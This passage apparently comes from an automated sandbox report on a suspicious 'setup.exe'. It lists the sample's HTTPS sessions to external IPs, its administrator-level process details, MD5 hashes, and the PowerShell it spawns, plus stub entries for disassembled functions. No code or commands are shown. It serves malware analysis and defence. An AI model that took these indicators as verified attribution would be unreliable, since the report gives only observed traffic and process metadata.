3 | 192.168.2.7 | 49749 | 188.114.97.3 | 443 | 5916 | C:\Users\user\Desktop\setup.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-07 14:26:21 UTC | 277 | OUT | |
2025-01-07 14:26:21 UTC | 15051 | OUT | |
2025-01-07 14:26:21 UTC | 1123 | IN | |
2025-01-07 14:26:21 UTC | 20 | IN | |
2025-01-07 14:26:21 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
4 | 192.168.2.7 | 49760 | 188.114.97.3 | 443 | 5916 | C:\Users\user\Desktop\setup.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-07 14:26:22 UTC | 278 | OUT | |
2025-01-07 14:26:22 UTC | 15331 | OUT | |
2025-01-07 14:26:22 UTC | 5051 | OUT | |
2025-01-07 14:26:23 UTC | 1131 | IN | |
2025-01-07 14:26:23 UTC | 20 | IN | |
2025-01-07 14:26:23 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
5 | 192.168.2.7 | 49772 | 188.114.97.3 | 443 | 5916 | C:\Users\user\Desktop\setup.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-07 14:26:24 UTC | 281 | OUT | |
2025-01-07 14:26:24 UTC | 1250 | OUT | |
2025-01-07 14:26:24 UTC | 1126 | IN | |
2025-01-07 14:26:24 UTC | 20 | IN | |
2025-01-07 14:26:24 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
6 | 192.168.2.7 | 49779 | 188.114.97.3 | 443 | 5916 | C:\Users\user\Desktop\setup.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-07 14:26:25 UTC | 281 | OUT | |
2025-01-07 14:26:25 UTC | 1110 | OUT | |
2025-01-07 14:26:30 UTC | 1127 | IN | |
2025-01-07 14:26:30 UTC | 20 | IN | |
2025-01-07 14:26:30 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
7 | 192.168.2.7 | 49816 | 188.114.97.3 | 443 | 5916 | C:\Users\user\Desktop\setup.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-07 14:26:30 UTC | 264 | OUT | |
2025-01-07 14:26:30 UTC | 113 | OUT | |
2025-01-07 14:26:31 UTC | 1130 | IN | |
2025-01-07 14:26:31 UTC | 218 | IN | |
2025-01-07 14:26:31 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
8 | 192.168.2.7 | 49823 | 185.161.251.21 | 443 | 5916 | C:\Users\user\Desktop\setup.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-07 14:26:32 UTC | 201 | OUT | |
2025-01-07 14:26:32 UTC | 249 | IN | |
2025-01-07 14:26:32 UTC | 329 | IN |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 09:26:05 |
Start date: | 07/01/2025 |
Path: | C:\Users\user\Desktop\setup.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 74'584'760 bytes |
MD5 hash: | 76F2E89ACE5C9B36679CE13B57C8B752 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | low |
Has exited: | true |
Target ID: | 10 |
Start time: | 09:26:32 |
Start date: | 07/01/2025 |
Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xb30000 |
File size: | 433'152 bytes |
MD5 hash: | C32CA4ACFCC635EC1EA6ED8A34DF5FAC |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 11 |
Start time: | 09:26:32 |
Start date: | 07/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff75da10000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Function 07670860 Relevance: 11.7, Strings: 9, Instructions: 457COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 07671C38 Relevance: 2.7, Strings: 2, Instructions: 226COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 03073FA0 Relevance: .7, Instructions: 687COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 03074198 Relevance: .1, Instructions: 107COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 03073010 Relevance: .1, Instructions: 65COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 07671E28 Relevance: .1, Instructions: 52COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02FBD01D Relevance: .0, Instructions: 45COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02FBD005 Relevance: .0, Instructions: 45COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0307136A Relevance: .1, Instructions: 112COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 07670148 Relevance: 12.8, Strings: 10, Instructions: 324COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 07670508 Relevance: 6.5, Strings: 5, Instructions: 275COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 07671F20 Relevance: 6.3, Strings: 5, Instructions: 71COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 07672428 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|